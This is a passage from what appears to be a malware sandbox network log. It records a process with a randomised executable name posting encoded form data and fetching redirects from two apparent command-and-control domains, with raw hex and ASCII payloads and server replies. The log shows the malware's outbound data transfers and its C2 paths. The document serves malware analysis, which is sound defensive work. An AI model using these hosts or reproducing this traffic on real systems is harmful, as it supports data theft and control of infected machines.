                                                                                                                                                    Data Ascii: 69.678,394.912L269.678,394.912c26.3,20.643,59.654,29.585,93.106,25.724l2.419-0.114" /> </g> <g id="legs"> <g id="legR"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" strok


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    13192.168.11.204974513.248.169.48801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:58:59.637206078 CEST702OUTPOST /9ned/ HTTP/1.1
                                                                                                                                                    Host: www.sleephygienist.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.sleephygienist.org
                                                                                                                                                    Referer: http://www.sleephygienist.org/9ned/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 77 32 68 5a 69 54 49 46 4f 2f 4f 64 7a 70 30 79 47 42 79 67 31 35 59 2b 6c 4c 67 71 68 62 34 63 46 43 67 47 35 54 4b 51 2b 61 45 33 78 4a 4a 42 69 43 4f 37 55 71 79 36 4a 4a 73 68 62 4d 49 76 70 77 65 2f 69 75 59 66 35 59 4c 36 59 78 41 45 70 54 6f 7a 77 4c 79 52 31 5a 59 54 72 79 6b 62 38 5a 71 46 68 4b 39 37 74 4d 46 62 51 79 52 78 2b 4e 49 73 45 70 2b 77 51 33 54 6b 71 73 5a 6b 32 2f 7a 4a 33 79 4e 4c 54 43 39 4a 38 78 37 54 55 6e 61 33 71 56 67 71 38 42 44 76 61 2b 68 32 31 2f 55 4d 49 61 72 77 78 72 31 57 34 4c 52 74 48 69 6f 48 6b 35 78 51 36 64 51 76 66 34 65 36 5a 67 3d 3d
                                                                                                                                                    Data Ascii: PbG=w2hZiTIFO/Odzp0yGByg15Y+lLgqhb4cFCgG5TKQ+aE3xJJBiCO7Uqy6JJshbMIvpwe/iuYf5YL6YxAEpTozwLyR1ZYTrykb8ZqFhK97tMFbQyRx+NIsEp+wQ3TkqsZk2/zJ3yNLTC9J8x7TUna3qVgq8BDva+h21/UMIarwxr1W4LRtHioHk5xQ6dQvf4e6Zg==


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    14192.168.11.204974613.248.169.48801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:59:02.270221949 CEST722OUTPOST /9ned/ HTTP/1.1
                                                                                                                                                    Host: www.sleephygienist.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.sleephygienist.org
                                                                                                                                                    Referer: http://www.sleephygienist.org/9ned/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 77 32 68 5a 69 54 49 46 4f 2f 4f 64 79 4a 45 79 45 6d 4f 67 39 35 59 2f 35 37 67 71 72 37 35 30 46 43 73 47 35 58 37 64 35 6f 77 33 2f 4d 31 42 6a 44 4f 37 58 71 79 36 43 70 73 39 44 73 49 77 70 77 43 42 69 75 30 66 35 63 6a 36 59 78 51 45 70 6c 67 30 77 62 79 58 75 70 59 4e 6c 53 6b 62 38 5a 71 46 68 4c 4e 64 74 4d 64 62 51 43 68 78 38 73 49 76 46 70 2b 33 41 58 54 6b 35 38 5a 67 32 2f 7a 72 33 32 4d 51 54 41 31 4a 38 77 4c 54 55 7a 47 30 7a 6c 67 73 78 68 44 68 56 2b 6b 63 35 64 55 2f 62 72 37 78 77 4c 6b 6f 77 39 41 33 61 51 63 6a 6e 71 74 69 2b 74 70 48 64 36 66 68 45 68 37 72 6a 52 75 59 32 4c 47 54 66 39 73 34 65 4d 30 33 6d 55 34 3d
                                                                                                                                                    Data Ascii: PbG=w2hZiTIFO/OdyJEyEmOg95Y/57gqr750FCsG5X7d5ow3/M1BjDO7Xqy6Cps9DsIwpwCBiu0f5cj6YxQEplg0wbyXupYNlSkb8ZqFhLNdtMdbQChx8sIvFp+3AXTk58Zg2/zr32MQTA1J8wLTUzG0zlgsxhDhV+kc5dU/br7xwLkow9A3aQcjnqti+tpHd6fhEh7rjRuY2LGTf9s4eM03mU4=


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    15192.168.11.204974713.248.169.48801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:59:04.895952940 CEST1289OUTPOST /9ned/ HTTP/1.1
                                                                                                                                                    Host: www.sleephygienist.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.sleephygienist.org
                                                                                                                                                    Referer: http://www.sleephygienist.org/9ned/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 77 32 68 5a 69 54 49 46 4f 2f 4f 64 79 4a 45 79 45 6d 4f 67 39 35 59 2f 35 37 67 71 72 37 35 30 46 43 73 47 35 58 37 64 35 6f 6f 33 2f 2b 74 42 6a 6b 69 37 57 71 79 36 65 35 73 2b 44 73 49 39 70 77 4b 64 69 75 4a 6b 35 61 6e 36 5a 53 6f 45 76 51 41 30 36 62 79 58 78 5a 59 4d 72 79 6b 30 38 59 61 5a 68 4c 39 64 74 4d 64 62 51 41 35 78 76 64 49 76 49 4a 2b 77 51 33 54 67 71 73 59 33 32 2f 71 63 33 32 41 41 54 78 56 4a 6c 51 62 54 53 41 75 30 73 56 67 75 39 42 43 6e 56 2f 59 48 35 65 77 64 62 72 50 66 77 4b 73 6f 31 73 31 61 4a 44 35 2f 39 38 73 71 37 64 64 4c 56 63 7a 4e 4c 52 4c 54 6e 51 7a 77 31 73 4c 61 64 4d 64 34 4d 63 49 6a 6b 44 38 50 56 62 79 37 6d 7a 4e 2f 2f 64 32 36 6a 31 44 31 73 6a 4d 36 65 2b 31 42 72 4b 5a 30 52 47 68 68 6a 4f 47 43 56 7a 53 38 6c 71 4d 2f 6a 38 58 43 6f 43 61 35 73 33 4a 30 45 44 70 50 63 36 74 50 45 38 4e 2b 36 71 52 4e 6e 49 70 41 44 71 51 36 57 6e 6a 49 38 72 42 48 31 37 4d 2b 67 33 4f 43 46 66 76 4b 35 4c 50 47 42 67 73 76 47 31 6f 6b 6c 65 47 74 77 79 [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=w2hZiTIFO/OdyJEyEmOg95Y/57gqr750FCsG5X7d5oo3/+tBjki7Wqy6e5s+DsI9pwKdiuJk5an6ZSoEvQA06byXxZYMryk08YaZhL9dtMdbQA5xvdIvIJ+wQ3TgqsY32/qc32AATxVJlQbTSAu0sVgu9BCnV/YH5ewdbrPfwKso1s1aJD5/98sq7ddLVczNLRLTnQzw1sLadMd4McIjkD8PVby7mzN//d26j1D1sjM6e+1BrKZ0RGhhjOGCVzS8lqM/j8XCoCa5s3J0EDpPc6tPE8N+6qRNnIpADqQ6WnjI8rBH17M+g3OCFfvK5LPGBgsvG1okleGtwy2xjwkrvQSfuyX3+PIVP6LnOw1jjDL+ApJ/9swwxewhWVe8oo5GADdgi2IP8RtpHIAv0/1Zxt9cjp1eUO2gMIFvBvwvpTG0OzDoZYVqQ0J8eD6hMIbhyCVZy8+qiVmjn2fG2oOHeD25pa1J9kzJ29pjK+y+xlAbJa0yC4fGN1UMbqHX68qSz+1HgZXb7K0hELFyA7Jans3UzwTiu+csZqx3YtF9Bs0fchfubSxuQKye/nc+UImL//NdDfMauHF7HHZtG6adyVcyo48WS2o5u+iIJr/p+apdCb8NXi50NOrqfc7AQyF1QqH7jpmZ/Rr7N6nzx3lkNtOPNOjdUV8gm7PDrOxJ7GFpaHaWQ8mvmevm9ZOSyMsTOiXOdJbJA428VmIWXDATyoweJb6Pk31IAL1QZ9mWCGMAaFNzHAzMW0MOYG/RUDHXtn4bSYIBpt+xvl
                                                                                                                                                    Oct 4, 2024 11:59:04.896003008 CEST5638OUTData Raw: 70 57 36 72 66 68 57 4f 63 31 73 64 6c 41 72 43 2b 45 56 56 35 44 79 77 59 6f 48 62 6a 72 50 57 63 67 38 4f 53 44 55 65 75 47 6b 7a 73 6e 32 39 6e 37 2f 45 65 36 5a 31 58 51 61 68 77 55 71 46 2f 73 61 6c 6c 6b 37 32 76 71 75 57 63 74 69 49 46 34
                                                                                                                                                    Data Ascii: pW6rfhWOc1sdlArC+EVV5DywYoHbjrPWcg8OSDUeuGkzsn29n7/Ee6Z1XQahwUqF/sallk72vquWctiIF4uTSx4yOstcXWr+utearqRyCAh7Mlm5JsFiOMIPfSUefW+49nDEWuiLnhmpVQT2kUxOGn5l6SnWyyQKD/zMhE/in6D+1o/gsN6+euWQw22B8dHKRyBkC8Yl16v0GFxnOoBIWFVpXjg4pora5UdOsGsqyxV6BsmTnNA


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    16192.168.11.204974813.248.169.48801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:59:07.520243883 CEST432OUTGET /9ned/?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.sleephygienist.org
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 11:59:07.622317076 CEST397INHTTP/1.1 200 OK
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Fri, 04 Oct 2024 09:59:07 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 257
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 50 62 47 3d 39 30 4a 35 68 6e 6b 4b 4d 71 57 6d 39 35 45 64 4f 44 48 56 67 59 55 38 6a 4c 6c 53 75 71 55 5a 4f 67 46 66 2f 69 50 49 79 72 56 71 78 4f 70 35 75 44 50 47 64 4c 6a 79 64 4b 35 62 65 63 74 78 73 79 33 42 74 74 52 6c 33 59 79 4c 4d 67 38 4a 68 78 45 33 76 4b 4b 6b 30 65 45 66 76 56 39 4b 70 59 53 39 67 64 42 70 6a 4a 74 44 63 43 31 79 78 75 64 52 42 4c 4d 3d 26 6d 32 57 34 79 3d 65 4c 71 50 33 7a 53 70 66 44 54 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?PbG=90J5hnkKMqWm95EdODHVgYU8jLlSuqUZOgFf/iPIyrVqxOp5uDPGdLjydK5bectxsy3BttRl3YyLMg8JhxE3vKKk0eEfvV9KpYS9gdBpjJtDcC1yxudRBLM=&m2W4y=eLqP3zSpfDT"}</script></head></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    17192.168.11.204974943.252.167.188801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:59:13.851603985 CEST708OUTPOST /y6iz/ HTTP/1.1
                                                                                                                                                    Host: www.xn--fhq1c541j0zr.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 200
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.xn--fhq1c541j0zr.com
                                                                                                                                                    Referer: http://www.xn--fhq1c541j0zr.com/y6iz/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 2b 6a 34 62 4f 56 69 35 6a 47 39 52 37 58 39 57 66 45 4d 30 50 2f 64 59 46 34 6f 45 61 46 63 53 39 6d 71 78 57 37 55 45 4f 69 49 68 4c 42 48 56 2f 59 6c 71 66 65 73 79 76 52 46 32 30 55 31 4a 69 35 76 54 35 4a 54 6c 64 6f 53 42 53 79 4a 51 57 77 63 63 77 57 31 43 6d 2b 58 4c 33 45 70 44 2f 46 45 53 75 39 35 4c 57 62 6e 53 4f 65 38 6d 51 6f 70 6b 6c 2f 6c 4d 5a 74 37 2f 62 62 2b 38 77 6c 70 45 41 65 56 43 4c 4d 36 4d 71 4b 49 31 67 4b 70 4e 61 54 32 4f 34 38 42 51 56 6b 6e 6c 72 43 4c 6b 56 73 58 4f 6c 45 42 6b 48 4e 59 64 42 55 78 49 64 75 55 58 77 68 55 75 37 2b 48 4b 55 67 3d 3d
                                                                                                                                                    Data Ascii: PbG=+j4bOVi5jG9R7X9WfEM0P/dYF4oEaFcS9mqxW7UEOiIhLBHV/YlqfesyvRF20U1Ji5vT5JTldoSBSyJQWwccwW1Cm+XL3EpD/FESu95LWbnSOe8mQopkl/lMZt7/bb+8wlpEAeVCLM6MqKI1gKpNaT2O48BQVknlrCLkVsXOlEBkHNYdBUxIduUXwhUu7+HKUg==
                                                                                                                                                    Oct 4, 2024 11:59:14.156435013 CEST367INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:08:58 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    18192.168.11.204975043.252.167.188801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:59:16.702156067 CEST728OUTPOST /y6iz/ HTTP/1.1
                                                                                                                                                    Host: www.xn--fhq1c541j0zr.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 220
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.xn--fhq1c541j0zr.com
                                                                                                                                                    Referer: http://www.xn--fhq1c541j0zr.com/y6iz/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 2b 6a 34 62 4f 56 69 35 6a 47 39 52 35 33 4e 57 64 6e 55 30 59 50 64 62 62 6f 6f 45 51 6c 63 65 39 68 69 78 57 35 35 63 4e 52 73 68 4c 68 33 56 74 4a 6c 71 52 2b 73 79 33 42 46 7a 70 6b 31 43 69 35 6a 78 35 4e 58 6c 64 73 43 42 53 77 52 51 57 6a 30 66 69 57 31 41 79 4f 58 46 7a 45 70 44 2f 46 45 53 75 39 74 79 57 62 50 53 50 75 4d 6d 52 4e 64 6e 35 50 6c 50 65 74 37 2f 51 37 2b 67 77 6c 70 79 41 62 78 6f 4c 4a 6d 4d 71 49 41 31 75 2b 64 4d 50 6a 32 4d 38 38 41 58 56 6e 32 54 6c 53 33 67 61 73 48 46 6c 55 52 74 4c 37 4a 48 63 6d 46 73 65 39 49 6c 30 52 74 47 35 38 47 52 4a 70 38 51 6e 6c 78 72 58 6a 36 34 47 6d 43 4d 4b 61 73 33 6b 4c 41 3d
                                                                                                                                                    Data Ascii: PbG=+j4bOVi5jG9R53NWdnU0YPdbbooEQlce9hixW55cNRshLh3VtJlqR+sy3BFzpk1Ci5jx5NXldsCBSwRQWj0fiW1AyOXFzEpD/FESu9tyWbPSPuMmRNdn5PlPet7/Q7+gwlpyAbxoLJmMqIA1u+dMPj2M88AXVn2TlS3gasHFlURtL7JHcmFse9Il0RtG58GRJp8QnlxrXj64GmCMKas3kLA=
                                                                                                                                                    Oct 4, 2024 11:59:17.018568993 CEST367INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:09:01 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    19192.168.11.204975143.252.167.188801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 11:59:19.532650948 CEST2578OUTPOST /y6iz/ HTTP/1.1
                                                                                                                                                    Host: www.xn--fhq1c541j0zr.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.xn--fhq1c541j0zr.com
                                                                                                                                                    Referer: http://www.xn--fhq1c541j0zr.com/y6iz/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 2b 6a 34 62 4f 56 69 35 6a 47 39 52 35 33 4e 57 64 6e 55 30 59 50 64 62 62 6f 6f 45 51 6c 63 65 39 68 69 78 57 35 35 63 4e 52 6b 68 49 53 2f 56 2f 36 64 71 53 2b 73 79 70 52 46 79 70 6b 31 62 69 35 37 31 35 4e 61 53 64 71 65 42 52 54 5a 51 43 47 49 66 34 47 31 41 74 65 58 45 33 45 70 53 2f 46 30 57 75 39 39 79 57 62 50 53 50 74 55 6d 57 59 70 6e 37 50 6c 4d 5a 74 37 6a 62 62 2b 63 77 68 4d 48 41 62 30 64 49 36 2b 4d 72 6f 51 31 73 4e 31 4d 4e 44 32 4b 78 63 41 31 56 6e 36 41 6c 53 71 5a 61 73 79 53 6c 56 5a 74 59 64 63 61 50 45 4e 74 42 4e 49 70 34 78 70 72 2b 2b 47 36 45 62 30 62 6a 54 77 47 57 6b 71 42 46 55 53 44 59 4b 5a 77 35 63 42 79 34 79 43 6c 74 4f 49 34 49 31 53 71 65 67 78 72 43 70 74 32 56 31 74 74 4f 65 55 69 62 4a 66 53 67 6e 77 4e 77 6d 33 78 45 7a 49 51 52 4d 52 56 44 39 5a 35 4a 41 76 68 6e 6a 55 6c 2b 56 6c 76 33 54 65 73 35 31 79 78 69 4e 46 51 52 2b 5a 43 46 4e 6b 7a 4b 50 52 48 51 45 37 4a 56 34 32 66 69 6b 4d 33 48 52 42 2f 6e 38 4d 57 65 6d 4f 75 45 41 71 2b 57 5a [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=+j4bOVi5jG9R53NWdnU0YPdbbooEQlce9hixW55cNRkhIS/V/6dqS+sypRFypk1bi5715NaSdqeBRTZQCGIf4G1AteXE3EpS/F0Wu99yWbPSPtUmWYpn7PlMZt7jbb+cwhMHAb0dI6+MroQ1sN1MND2KxcA1Vn6AlSqZasySlVZtYdcaPENtBNIp4xpr++G6Eb0bjTwGWkqBFUSDYKZw5cBy4yCltOI4I1SqegxrCpt2V1ttOeUibJfSgnwNwm3xEzIQRMRVD9Z5JAvhnjUl+Vlv3Tes51yxiNFQR+ZCFNkzKPRHQE7JV42fikM3HRB/n8MWemOuEAq+WZLxH77LROzcGy9AoYwTyN0rFYzQQGSLQweu3TdmAMMv+R+WbQU9LCwqhIA0IC1ef0CNwpEXIVxrBA/AjcXDgo+X2ddZ6J+zqqbGxyUsJAriDrxFfrs/vdn2L71kLHNZ+A5Z1DTnCUMrieC2D8PLILY6su8QRZc+LzJHU371YyU9BUyHBWx2RSV5eqcronmJCy8xRdIbG+Krpr6HpYviqS4XncWm2HLHAtK67FcckCGiTKHDwvpZP56lo0uCbU42M8Koi0VYOtYTBeH9JZ2XM1H4Goz2CrF7CgTfUwOT/YHTT4xOVkdu7YW3y3ZQED+cy87BhDBr5KMnziAmM01g1dnbFspgZAjFIMdVeCkTQXVVjLFkXoJO9HUJv2L6qHzG+r3uSKAjLwrPhEmjLYPzoFPD/Ad2lidIY0QapjvMgMLCcylRQAB3yUpIV4d+5AAtBCrNDDSS5d+TJfzcFmOkGA+mB0gKWMq9eQGlQSbDxV7c1KhOaXe756OVfmuyO91p+EUUhBuzRPiw7ZpAuT7TFCIHjSIrukA1gd8nXoZN79l31c0P3tzsoAlD1EahsUPnMseAPC8pwVymDwn3GdCdL6SFQHDEaBiYX4WB1wDCU+YKCpD1rk8L0njHvjnwpAeIZjwcQGeZIPBBDHLI7072/DxL8162vs/5LeQ1 [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 11:59:19.532670021 CEST4355OUTData Raw: 69 44 4c 59 66 37 79 58 63 33 72 57 64 6b 69 2b 2b 67 59 30 50 66 46 32 49 58 74 49 76 57 32 2b 47 70 70 4e 33 73 68 35 2b 63 39 76 69 61 41 77 7a 54 45 64 4e 6d 2b 76 53 36 31 49 4b 6c 2f 59 64 73 6b 41 49 67 33 41 4f 48 74 47 59 51 41 42 77 47
                                                                                                                                                    Data Ascii: iDLYf7yXc3rWdki++gY0PfF2IXtIvW2+GppN3sh5+c9viaAwzTEdNm+vS61IKl/YdskAIg3AOHtGYQABwGl7jkqZxzmyDmDfQalsCFpzLbIQVZGnDFiZ0rvbi7GIERGmum74Y05PCuNrbsKGtmAxKyjkVBW/TtisfC4erzPTtEltaVzRE391HfuJXXr+jGNhQYxHbCfkpFwXyWET6/loJeheMcpkS8hixAqQQnjff3PqiOJ6Iaz
                                                                                                                                                    Oct 4, 2024 11:59:19.836638927 CEST367INHTTP/1.1 404 Not Found
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:09:03 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Content-Length: 203
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 36 69 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y6iz/ was not found on this server.</p></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    20192.168.11.204975243.252.167.188801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
